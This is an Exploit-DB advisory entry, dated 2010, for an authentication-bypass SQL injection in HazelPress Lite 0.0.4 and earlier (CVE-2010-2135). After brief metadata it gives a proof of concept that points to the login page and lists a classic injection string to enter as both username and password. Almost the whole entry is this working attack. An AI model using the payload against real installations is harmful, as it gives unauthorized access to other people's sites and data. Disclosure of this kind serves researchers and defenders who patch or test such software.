HazelPress Lite <= 0.0.4 Auth Bypass SQL Injection Vulnerability

2010-02-28T00:00:00
ID EDB-ID:11602
Type exploitdb
Reporter cr4wl3r
Modified 2010-02-28T00:00:00

Description

HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability. CVE-2010-2135. Webapps exploit for the PHP platform.

                                        
# HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: http://hazelpress.org/index.php?hazel=downloads

# PoC: [path]/login.php

# Username: ' or '1=1
# password: ' or '1=1